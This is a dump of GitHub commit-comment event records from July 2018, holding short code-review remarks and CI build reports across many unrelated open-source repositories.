{"id":"8014582073","type":"CommitCommentEvent","actor":{"login":"MDVAurelien"},"repo":{"name":"anthonyraymond/joal"},"payload":{"comment":{"id":29824796,"position":null,"line":null,"path":null,"commit_id":"0ffde6724e87e2d70f811bce8fc3e3db744137a7","created_at":"2018-07-25T07:07:59Z","updated_at":"2018-07-25T07:07:59Z","author_association":"NONE","body":"Seriously a big thank you for your incredible speed !!! it works perfectly with this new version, strange!"}},"created_at":"2018-07-25T07:07:59Z"}
{"id":"8014583118","type":"CommitCommentEvent","actor":{"login":"fangshuweiok"},"repo":{"name":"fangshuweiok/demoSSM01"},"payload":{"comment":{"id":29824798,"position":null,"line":null,"path":null,"commit_id":"fb7bef7f4c58a657b7123f3145dae99fdedc398b","created_at":"2018-07-25T07:08:12Z","updated_at":"2018-07-25T07:08:12Z","author_association":"OWNER","body":"看看如何2"}},"created_at":"2018-07-25T07:08:12Z"}
{"id":"8014583658","type":"CommitCommentEvent","actor":{"login":"dedmen"},"repo":{"name":"MidnightGH/Text-Adventure"},"payload":{"comment":{"id":29824799,"position":40,"line":40,"path":"TxtAdv/TxtAdv/ActionSource.cpp","commit_id":"06a58b18ea8f3b6e3536bef39ddd25cb63476acb","created_at":"2018-07-25T07:08:19Z","updated_at":"2018-07-25T07:08:19Z","author_association":"NONE","body":"could be done shorter. `if (playerName.empty) return;`"}},"created_at":"2018-07-25T07:08:19Z"}
{"id":"8014583690","type":"CommitCommentEvent","actor":{"login":"WenguoLi"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29824800,"position":null,"line":null,"path":null,"commit_id":"f4f92acbcd0994299882260fe4f4896385e6bff9","created_at":"2018-07-25T07:08:20Z","updated_at":"2018-07-25T07:08:20Z","author_association":"NONE","body":"Is SpaceToBatchND operation  supported by the quantization rewrite  ? "}},"created_at":"2018-07-25T07:08:20Z"}
{"id":"8014584557","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29824802,"position":22,"line":76,"path":"src/processing/processing.c","commit_id":"9b3d31613ced492a79d3ca8faf130c825077acbf","created_at":"2018-07-25T07:08:32Z","updated_at":"2018-07-25T07:08:32Z","author_association":"COLLABORATOR","body":"Where did you find this? ;)"}},"created_at":"2018-07-25T07:08:32Z"}
{"id":"8014586341","type":"CommitCommentEvent","actor":{"login":"jma"},"repo":{"name":"ntarocco/invenio-circulation"},"payload":{"comment":{"id":29824804,"position":32,"line":37,"path":"tests/test_loan.py","commit_id":"8b43ccfede3825fcd729968dbbd8ae3dcec1c86e","created_at":"2018-07-25T07:08:56Z","updated_at":"2018-07-25T07:08:56Z","author_association":"NONE","body":"Do you have an use case to have a state with only one destination?  For circulation I think the `cancel` action can be fire from any state.\r\n\r\nFrontend is just a way for a librarian to fire an action to an item. In such case, I think the action should be explicit."}},"created_at":"2018-07-25T07:08:56Z"}
{"id":"8014586751","type":"CommitCommentEvent","actor":{"login":"dedmen"},"repo":{"name":"MidnightGH/Text-Adventure"},"payload":{"comment":{"id":29824806,"position":49,"line":49,"path":"TxtAdv/TxtAdv/ActionSource.cpp","commit_id":"06a58b18ea8f3b6e3536bef39ddd25cb63476acb","created_at":"2018-07-25T07:09:02Z","updated_at":"2018-07-25T07:09:02Z","author_association":"NONE","body":"srand/rand are C. Not c++.\r\nhttps://stackoverflow.com/a/13445752\r\nThis is the C++ way. It's \"more\" random and safer. But also more to write."}},"created_at":"2018-07-25T07:09:02Z"}
{"id":"8014593439","type":"CommitCommentEvent","actor":{"login":"brian-brazil"},"repo":{"name":"midonet/midonet"},"payload":{"comment":{"id":29824809,"position":38,"line":65,"path":"midolman/src/main/scala/org/midonet/midolman/management/Metering.scala","commit_id":"4aec3b372b54a6cf0e46e17bcb60fa4300407bb6","created_at":"2018-07-25T07:10:37Z","updated_at":"2018-07-25T07:10:37Z","author_association":"NONE","body":"I doubt that all your metrics are counters, it's safest to use `untyped` when there's a mix."}},"created_at":"2018-07-25T07:10:37Z"}
{"id":"8014595629","type":"CommitCommentEvent","actor":{"login":"Anrymart"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29824812,"position":21,"line":21,"path":"src/app/components/quote/quote.component.ts","commit_id":"7fd361e940c7bba0491fac10c2b407f9a6e8413a","created_at":"2018-07-25T07:11:08Z","updated_at":"2018-07-25T07:11:08Z","author_association":"NONE","body":"Желательно указывать тип аргумента"}},"created_at":"2018-07-25T07:11:08Z"}
{"id":"8014596106","type":"CommitCommentEvent","actor":{"login":"brian-brazil"},"repo":{"name":"midonet/midonet"},"payload":{"comment":{"id":29824813,"position":58,"line":85,"path":"midolman/src/main/scala/org/midonet/midolman/management/Metering.scala","commit_id":"4aec3b372b54a6cf0e46e17bcb60fa4300407bb6","created_at":"2018-07-25T07:11:15Z","updated_at":"2018-07-25T07:11:15Z","author_association":"NONE","body":"You should not expose timestamps, as that'll cause staleness issues."}},"created_at":"2018-07-25T07:11:15Z"}
{"id":"8014597207","type":"CommitCommentEvent","actor":{"login":"dedmen"},"repo":{"name":"MidnightGH/Text-Adventure"},"payload":{"comment":{"id":29824815,"position":47,"line":47,"path":"TxtAdv/TxtAdv/FunctionSource.cpp","commit_id":"06a58b18ea8f3b6e3536bef39ddd25cb63476acb","created_at":"2018-07-25T07:11:32Z","updated_at":"2018-07-25T07:11:32Z","author_association":"NONE","body":"afaik you can get rid of the lambda by just passing the tolower function.\r\n`std::transform(s.begin(), s.end(), s.begin(), std::tolower)`\r\nAlso this could take the input string by non-const reference. And then you just return void."}},"created_at":"2018-07-25T07:11:32Z"}
{"id":"8014598154","type":"CommitCommentEvent","actor":{"login":"HanSolo"},"repo":{"name":"HanSolo/tilesfx"},"payload":{"comment":{"id":29824819,"position":null,"line":null,"path":null,"commit_id":"37f823d8c77c60915847395d3bd6b096ade949a6","created_at":"2018-07-25T07:11:46Z","updated_at":"2018-07-25T07:11:46Z","author_association":"OWNER","body":"sorry but that IS the key 😊"}},"created_at":"2018-07-25T07:11:46Z"}
{"id":"8014599976","type":"CommitCommentEvent","actor":{"login":"Anrymart"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29824826,"position":23,"line":23,"path":"src/app/components/quote/quote.component.ts","commit_id":"7fd361e940c7bba0491fac10c2b407f9a6e8413a","created_at":"2018-07-25T07:12:10Z","updated_at":"2018-07-25T07:12:10Z","author_association":"NONE","body":"Разобрался, чем отличается `data['quote']` и `data.quote`?"}},"created_at":"2018-07-25T07:12:10Z"}
{"id":"8014600579","type":"CommitCommentEvent","actor":{"login":"jma"},"repo":{"name":"ntarocco/invenio-circulation"},"payload":{"comment":{"id":29824829,"position":66,"line":23,"path":"invenio_circulation/config.py","commit_id":"8b43ccfede3825fcd729968dbbd8ae3dcec1c86e","created_at":"2018-07-25T07:12:19Z","updated_at":"2018-07-25T07:12:19Z","author_association":"NONE","body":"How to generate all routes for all action automatically as done in your PR?"}},"created_at":"2018-07-25T07:12:19Z"}
{"id":"8014601655","type":"CommitCommentEvent","actor":{"login":"Anrymart"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29824832,"position":10,"line":10,"path":"src/app/components/services/quote-service/quote.service.ts","commit_id":"7fd361e940c7bba0491fac10c2b407f9a6e8413a","created_at":"2018-07-25T07:12:34Z","updated_at":"2018-07-25T07:12:34Z","author_association":"NONE","body":"Нужно ещё возвращаемое значение"}},"created_at":"2018-07-25T07:12:34Z"}
{"id":"8014605128","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29824839,"position":null,"line":null,"path":null,"commit_id":"919b7fd5c9c22d66f2e0723b093e67b78f84f8e3","created_at":"2018-07-25T07:13:25Z","updated_at":"2018-07-25T07:13:25Z","author_association":"COLLABORATOR","body":"Is that linear to bmdfilm 3d lut? 4K or older one?"}},"created_at":"2018-07-25T07:13:25Z"}
{"id":"8014607636","type":"CommitCommentEvent","actor":{"login":"zacksleo"},"repo":{"name":"NervJS/taro"},"payload":{"comment":{"id":29824850,"position":null,"line":null,"path":null,"commit_id":"db8e267b7f2c80e788ea11c3908d7681179603b0","created_at":"2018-07-25T07:14:01Z","updated_at":"2018-07-25T07:14:01Z","author_association":"CONTRIBUTOR","body":"closed #666"}},"created_at":"2018-07-25T07:14:01Z"}
{"id":"8014607853","type":"CommitCommentEvent","actor":{"login":"Dev-iL"},"repo":{"name":"StackOverflowMATLABchat/uiget"},"payload":{"comment":{"id":29824851,"position":2,"line":1,"path":"README.md","commit_id":"952a8b1f661850a3ec05dd19bd282eebca1c6571","created_at":"2018-07-25T07:14:04Z","updated_at":"2018-07-25T07:14:04Z","author_association":"MEMBER","body":"Sshield should say \"uiget\" and not \"legtools\" :)"}},"created_at":"2018-07-25T07:14:04Z"}
{"id":"8014612053","type":"CommitCommentEvent","actor":{"login":"jma"},"repo":{"name":"ntarocco/invenio-circulation"},"payload":{"comment":{"id":29824859,"position":51,"line":65,"path":"invenio_circulation/ext.py","commit_id":"8b43ccfede3825fcd729968dbbd8ae3dcec1c86e","created_at":"2018-07-25T07:15:05Z","updated_at":"2018-07-25T07:15:05Z","author_association":"NONE","body":"How to be sure that only one transition is executed?"}},"created_at":"2018-07-25T07:15:05Z"}
{"id":"8014612474","type":"CommitCommentEvent","actor":{"login":"sagaceilo"},"repo":{"name":"g-truc/glm"},"payload":{"comment":{"id":29824860,"position":null,"line":null,"path":null,"commit_id":"c3c8b73c57a4c987c2890c16a0bb27fe6f3ba04a","created_at":"2018-07-25T07:15:10Z","updated_at":"2018-07-25T07:15:10Z","author_association":"NONE","body":"For some time I have issues with constexpr. I'm using VC2017 with c++17 compiler flag. The code that does not compiles:\r\n\r\n`constexpr inline glm::vec2\tGetRange() const { return { 0.0f, 1.0f }; }` <- cannot construct vec2 as constexpr.\r\n\r\nMy GL_CONSTEXPR define is empty, I;ve tried to trace what configuration breaks it and seems that \r\n\r\n`!(GLM_ARCH & GLM_ARCH_SIMD_BIT)` in define GLM_HAS_CONSTEXPR returns false. (My GLM_ARCH is `GLM_ARCH_SSE2\t\t(GLM_ARCH_SSE2_BIT | GLM_ARCH_SIMD_BIT | GLM_ARCH_X86)`\r\n\r\n\r\n"}},"created_at":"2018-07-25T07:15:10Z"}
{"id":"8014613018","type":"CommitCommentEvent","actor":{"login":"ntarocco"},"repo":{"name":"ntarocco/invenio-circulation"},"payload":{"comment":{"id":29824864,"position":66,"line":23,"path":"invenio_circulation/config.py","commit_id":"8b43ccfede3825fcd729968dbbd8ae3dcec1c86e","created_at":"2018-07-25T07:15:17Z","updated_at":"2018-07-25T07:15:17Z","author_association":"OWNER","body":"The `src` param is probably not needed, it might be a nice to have if we want to check if the current state is valid."}},"created_at":"2018-07-25T07:15:17Z"}
{"id":"8014615336","type":"CommitCommentEvent","actor":{"login":"ntarocco"},"repo":{"name":"ntarocco/invenio-circulation"},"payload":{"comment":{"id":29824868,"position":66,"line":23,"path":"invenio_circulation/config.py","commit_id":"8b43ccfede3825fcd729968dbbd8ae3dcec1c86e","created_at":"2018-07-25T07:15:47Z","updated_at":"2018-07-25T07:15:47Z","author_association":"OWNER","body":"We don't need anymore all the actions exposed. There is only `next` action now."}},"created_at":"2018-07-25T07:15:47Z"}
{"id":"8014618424","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29824872,"position":195,"line":110,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T07:16:31Z","updated_at":"2018-07-25T07:16:31Z","author_association":"MEMBER","body":"I think that as per requirement; bonus amount lock duration should be different with fixed amount.\r\n\r\nfixed amount will be locked 1 year\r\nbonus amount will be locked 2 years\r\n\r\nright?"}},"created_at":"2018-07-25T07:16:31Z"}
{"id":"8014619525","type":"CommitCommentEvent","actor":{"login":"Hossam-Tarek"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29824874,"position":24,"line":55,"path":"app/src/main/java/com/example/android/quakereport/SettingsActivity.java","commit_id":"05190298d7e6a7de21e3beb8f940e133fea67b4c","created_at":"2018-07-25T07:16:46Z","updated_at":"2018-07-25T07:16:46Z","author_association":"NONE","body":"in case of the value isn't in the list, so the method will return -1"}},"created_at":"2018-07-25T07:16:46Z"}
{"id":"8014620099","type":"CommitCommentEvent","actor":{"login":"PeterStudioWeb"},"repo":{"name":"opencart/opencart"},"payload":{"comment":{"id":29824875,"position":null,"line":null,"path":null,"commit_id":"d572831caca12926b32652a4f354cd196a5b719d","created_at":"2018-07-25T07:16:55Z","updated_at":"2018-07-25T07:16:55Z","author_association":"NONE","body":"Select Currency & Language not working ((("}},"created_at":"2018-07-25T07:16:55Z"}
{"id":"8014621614","type":"CommitCommentEvent","actor":{"login":"ntarocco"},"repo":{"name":"ntarocco/invenio-circulation"},"payload":{"comment":{"id":29824877,"position":68,"line":25,"path":"invenio_circulation/config.py","commit_id":"8b43ccfede3825fcd729968dbbd8ae3dcec1c86e","created_at":"2018-07-25T07:17:19Z","updated_at":"2018-07-25T07:17:19Z","author_association":"OWNER","body":"Well, each transition is the action. We were actually not convinced about transitions' naming, which could be the action.\r\nTo create the states chart, we could iterate over the config and generate it, or refactor this data structure to be able to do it"}},"created_at":"2018-07-25T07:17:19Z"}
{"id":"8014623404","type":"CommitCommentEvent","actor":{"login":"fisker"},"repo":{"name":"yued-fe/lulu"},"payload":{"comment":{"id":29824878,"position":9,"line":205,"path":"theme/peak/js/common/comp/Table.js","commit_id":"aa43adc4b2a1b03a024e0f6460c8e592a0a48fc0","created_at":"2018-07-25T07:17:46Z","updated_at":"2018-07-25T07:17:46Z","author_association":"CONTRIBUTOR","body":"i think `jQuery#is` is better"}},"created_at":"2018-07-25T07:17:46Z"}
{"id":"8014630352","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/pli-extras"},"payload":{"comment":{"id":29824888,"position":null,"line":null,"path":null,"commit_id":"e9267e03e6465c7a915b0bb4345ce2aa08f0ce3f","created_at":"2018-07-25T07:19:23Z","updated_at":"2018-07-25T07:19:23Z","author_association":"MEMBER","body":"@Hains \r\nWith this it takes time, we need to make this available as an optional switch ..."}},"created_at":"2018-07-25T07:19:23Z"}
{"id":"8014630484","type":"CommitCommentEvent","actor":{"login":"jma"},"repo":{"name":"ntarocco/invenio-circulation"},"payload":{"comment":{"id":29824889,"position":73,"line":73,"path":"invenio_circulation/transitions.py","commit_id":"8b43ccfede3825fcd729968dbbd8ae3dcec1c86e","created_at":"2018-07-25T07:19:25Z","updated_at":"2018-07-25T07:19:25Z","author_association":"NONE","body":"Can be replace in the base class by checking allowed actions."}},"created_at":"2018-07-25T07:19:25Z"}
{"id":"8014637658","type":"CommitCommentEvent","actor":{"login":"dadalisherwari12"},"repo":{"name":"dadalisherwari12/mynewrepository"},"payload":{"comment":{"id":29824903,"position":null,"line":null,"path":null,"commit_id":"70668410f2c4ef3232edefa7df06744467278a52","created_at":"2018-07-25T07:21:01Z","updated_at":"2018-07-25T07:21:01Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-25T07:21:01Z"}
{"id":"8014643096","type":"CommitCommentEvent","actor":{"login":"ntarocco"},"repo":{"name":"ntarocco/invenio-circulation"},"payload":{"comment":{"id":29824914,"position":32,"line":37,"path":"tests/test_loan.py","commit_id":"8b43ccfede3825fcd729968dbbd8ae3dcec1c86e","created_at":"2018-07-25T07:22:13Z","updated_at":"2018-07-25T07:22:13Z","author_association":"OWNER","body":"yes, for example the `{ action: checkout }` is triggering a specific transition. If you add a new transition `AnyToCancelled` with condition `action == cancel`, you can trigger it. The problem of this is that it depends on order, sorting of transitions, because it evaluates conditions sequentially.\r\nMaybe be need a way to \"force\" a transition unconditionally, but we are still not sure about this...\r\n\r\nThe idea at the beginning was to expose all possible actions at this state and trigger one manually... while now, we think your version of \"automatic\" state change is better and you need only one action exposed, `next`. (unless the case mentioned above)."}},"created_at":"2018-07-25T07:22:13Z"}
{"id":"8014643229","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29824915,"position":null,"line":null,"path":null,"commit_id":"1390eb2957b89f04adce0b92a8cca83f22c30a04","created_at":"2018-07-25T07:22:14Z","updated_at":"2018-07-25T07:22:14Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/digest-email-frequency-not-updating-for-existing-users/92045/10\n"}},"created_at":"2018-07-25T07:22:14Z"}
{"id":"8014644380","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29824918,"position":null,"line":null,"path":null,"commit_id":"10d98e67d88231fd41218a93b92d42914550ee10","created_at":"2018-07-25T07:22:30Z","updated_at":"2018-07-25T07:22:30Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/29/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/29//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/master/10d98e67d88231fd41218a93b92d42914550ee10/29/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/master/10d98e67d88231fd41218a93b92d42914550ee10/29/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/master/10d98e67d88231fd41218a93b92d42914550ee10/29/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/master/10d98e67d88231fd41218a93b92d42914550ee10/29/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n<details>\n<summary>1 tests failed, 0 tests skipped, 224 tests passed.</summary>\n\n## Failed tests\n\n * System/Mac/Modern: Failed (Test run failed.)\n</details>\n"}},"created_at":"2018-07-25T07:22:30Z"}
{"id":"8014644962","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29824920,"position":4,"line":4,"path":"1/area_of_a_triangle.rb","commit_id":"62004b257bfb8962a23439a9c9c5542e329bdfcd","created_at":"2018-07-25T07:22:37Z","updated_at":"2018-07-25T07:22:37Z","author_association":"NONE","body":"Значение могут быть не целыми. Нужно использовать to_f, потому-что может выйти не правильный результат при делении\r\n```\r\n2.5.0 :002 > 3 / 2\r\n => 1\r\n2.5.0 :003 > 3.to_f / 2\r\n => 1.5\r\n2.5.0 :004 >\r\n```"}},"created_at":"2018-07-25T07:22:37Z"}
{"id":"8014645289","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29824921,"position":null,"line":null,"path":null,"commit_id":"fc1b41bea3db8faffec69bf84e79a557a8c8127a","created_at":"2018-07-25T07:22:43Z","updated_at":"2018-07-25T07:22:43Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - Win64-Windows-7-VisualStudio-14: OK (2947 of 2948 tests passed, 1 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 657\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-25T07:22:43Z"}
{"id":"8014645407","type":"CommitCommentEvent","actor":{"login":"nlhiorth"},"repo":{"name":"usit-gd/mreg"},"payload":{"comment":{"id":29824923,"position":null,"line":null,"path":null,"commit_id":"08dd13384bbf03203aec3841073d47aaf9010beb","created_at":"2018-07-25T07:22:44Z","updated_at":"2018-07-25T07:22:44Z","author_association":"COLLABORATOR","body":"This implements #53 "}},"created_at":"2018-07-25T07:22:44Z"}
{"id":"8014677057","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29825014,"position":4,"line":4,"path":"1/ideal_weight.rb","commit_id":"cd58f9c5cffe238bb25408935cc8d9220d877cf0","created_at":"2018-07-25T07:29:45Z","updated_at":"2018-07-25T07:29:45Z","author_association":"NONE","body":"тут нужен to_i см area_of_a_triangle.rb"}},"created_at":"2018-07-25T07:29:45Z"}
{"id":"8014677375","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29825015,"position":64,"line":120,"path":"Nianyi.js","commit_id":"3ec8d7c3c7a35fcf589631a4f22ab5833c6037de","created_at":"2018-07-25T07:29:49Z","updated_at":"2018-07-25T07:29:49Z","author_association":"OWNER","body":"Codes above are all borrowed from [ljharb's work](https://github.com/ljharb/is-arrow-function)."}},"created_at":"2018-07-25T07:29:49Z"}
{"id":"8014677975","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29825016,"position":null,"line":null,"path":null,"commit_id":"373c313a3e642c04c52f6000d9584f0a65ad28e4","created_at":"2018-07-25T07:29:57Z","updated_at":"2018-07-25T07:29:57Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/d15-8/11/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/d15-8/11//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/d15-8/373c313a3e642c04c52f6000d9584f0a65ad28e4/11/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/d15-8/373c313a3e642c04c52f6000d9584f0a65ad28e4/11/jenkins-results/apicomparison/index.html) (no change)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/d15-8/373c313a3e642c04c52f6000d9584f0a65ad28e4/11/jenkins-results/generator-diff/index.html) (only version changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/d15-8/373c313a3e642c04c52f6000d9584f0a65ad28e4/11/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-25T07:29:57Z"}
{"id":"8014678415","type":"CommitCommentEvent","actor":{"login":"Executioner1939"},"repo":{"name":"JPienaar1/trn-api-Address"},"payload":{"comment":{"id":29825019,"position":24,"line":27,"path":"src/main/scala/Handlers/Akka.scala","commit_id":"860e0b204ccdc4532b13da0fc8edb6e42c5a1ddf","created_at":"2018-07-25T07:30:03Z","updated_at":"2018-07-25T07:30:03Z","author_association":"NONE","body":"Should be StatusCodes.InternalServerError"}},"created_at":"2018-07-25T07:30:03Z"}
{"id":"8014678550","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825020,"position":182,"line":97,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T07:30:05Z","updated_at":"2018-07-25T07:30:05Z","author_association":"MEMBER","body":"dont need to declare `lockDuration` use `LOCK_DURATION` directly is OK"}},"created_at":"2018-07-25T07:30:05Z"}
{"id":"8014683439","type":"CommitCommentEvent","actor":{"login":"zxtchiu"},"repo":{"name":"rock-planning/planning-vfh_star"},"payload":{"comment":{"id":29825034,"position":null,"line":null,"path":null,"commit_id":"11c84beef9f881193da34303c8a8d99907751a36","created_at":"2018-07-25T07:31:10Z","updated_at":"2018-07-25T07:31:10Z","author_association":"NONE","body":"why  i  did not  find  base   library???  help  me?"}},"created_at":"2018-07-25T07:31:10Z"}
{"id":"8014684800","type":"CommitCommentEvent","actor":{"login":"Executioner1939"},"repo":{"name":"JPienaar1/trn-api-Address"},"payload":{"comment":{"id":29825037,"position":28,"line":34,"path":"src/main/scala/Handlers/Mongo.scala","commit_id":"860e0b204ccdc4532b13da0fc8edb6e42c5a1ddf","created_at":"2018-07-25T07:31:29Z","updated_at":"2018-07-25T07:31:29Z","author_association":"NONE","body":"findOne must return an Option[Address]"}},"created_at":"2018-07-25T07:31:29Z"}
{"id":"8014686853","type":"CommitCommentEvent","actor":{"login":"Executioner1939"},"repo":{"name":"JPienaar1/trn-api-Address"},"payload":{"comment":{"id":29825041,"position":28,"line":34,"path":"src/main/scala/Handlers/Mongo.scala","commit_id":"860e0b204ccdc4532b13da0fc8edb6e42c5a1ddf","created_at":"2018-07-25T07:31:58Z","updated_at":"2018-07-25T07:31:58Z","author_association":"NONE","body":"It shouldn't take a limit or offset"}},"created_at":"2018-07-25T07:31:58Z"}
{"id":"8014688126","type":"CommitCommentEvent","actor":{"login":"Executioner1939"},"repo":{"name":"JPienaar1/trn-api-Address"},"payload":{"comment":{"id":29825042,"position":32,"line":38,"path":"src/main/scala/Handlers/Mongo.scala","commit_id":"860e0b204ccdc4532b13da0fc8edb6e42c5a1ddf","created_at":"2018-07-25T07:32:14Z","updated_at":"2018-07-25T07:32:14Z","author_association":"NONE","body":"Return the newly inserted Address"}},"created_at":"2018-07-25T07:32:14Z"}
{"id":"8014689495","type":"CommitCommentEvent","actor":{"login":"zxtchiu"},"repo":{"name":"rock-planning/planning-vfh_star"},"payload":{"comment":{"id":29825045,"position":null,"line":null,"path":null,"commit_id":"11c84beef9f881193da34303c8a8d99907751a36","created_at":"2018-07-25T07:32:34Z","updated_at":"2018-07-25T07:32:34Z","author_association":"NONE","body":"base is a standard  library  or thirdparty ???"}},"created_at":"2018-07-25T07:32:34Z"}
{"id":"8014689806","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825046,"position":120,"line":85,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T07:32:39Z","updated_at":"2018-07-25T07:32:39Z","author_association":"MEMBER","body":"is this case there's not much secure issue because only owner can call this method but need to always remember to update state before calling send/transfer "}},"created_at":"2018-07-25T07:32:39Z"}
{"id":"8014690076","type":"CommitCommentEvent","actor":{"login":"Executioner1939"},"repo":{"name":"JPienaar1/trn-api-Address"},"payload":{"comment":{"id":29825048,"position":31,"line":37,"path":"src/main/scala/Handlers/Mongo.scala","commit_id":"860e0b204ccdc4532b13da0fc8edb6e42c5a1ddf","created_at":"2018-07-25T07:32:42Z","updated_at":"2018-07-25T07:32:42Z","author_association":"NONE","body":"Return the newly created Address"}},"created_at":"2018-07-25T07:32:42Z"}
{"id":"8014691734","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29825051,"position":107,"line":136,"path":"Nianyi.js","commit_id":"b9a42ee9d590633ae0653109666d7eac5e6ac556","created_at":"2018-07-25T07:33:06Z","updated_at":"2018-07-25T07:33:06Z","author_association":"OWNER","body":"Calling `_copy(obj, ignore_hidden)` recursively when an nested object is passed in."}},"created_at":"2018-07-25T07:33:06Z"}
{"id":"8014691988","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29825052,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T07:33:09Z","updated_at":"2018-07-25T07:33:09Z","author_association":"COLLABORATOR","body":"I think we need activate all processing sliders in both cases. (they are not log profiles)"}},"created_at":"2018-07-25T07:33:09Z"}
{"id":"8014695108","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29825056,"position":8,"line":8,"path":"1/quadratic_equation_solutions.rb","commit_id":"116308d7d2f54446a0a6b540f1df36b7d6e5c159","created_at":"2018-07-25T07:33:49Z","updated_at":"2018-07-25T07:33:49Z","author_association":"NONE","body":"Тут и в дальнейшем\r\n\r\nрекомендуется использовать пробелы до и после арифметических операторов, операторов сравнения, логических операторов\r\n\r\nпримеры:\r\n```\r\n    b * b # хорошо\r\n    b*b   # плохо\r\n\r\n    a > b # хорошо\r\n    a>b   # плохо\r\n\r\n    a && b # хорошо\r\n    a&&b   # плохо\r\n```\r\nпри этом оператор возведения в степень не рекомендуется выделять пробелами\r\n```\r\n    c**2   # хорошо\r\n    c ** 2 # плохо\r\n```"}},"created_at":"2018-07-25T07:33:49Z"}
{"id":"8014698700","type":"CommitCommentEvent","actor":{"login":"JayQianxuewei"},"repo":{"name":"JayQianxuewei/demo2"},"payload":{"comment":{"id":29825060,"position":null,"line":null,"path":null,"commit_id":"d7142c0c563989292dd833dc0bfe466f6b2d8eca","created_at":"2018-07-25T07:34:37Z","updated_at":"2018-07-25T07:34:37Z","author_association":"OWNER","body":"hello"}},"created_at":"2018-07-25T07:34:37Z"}
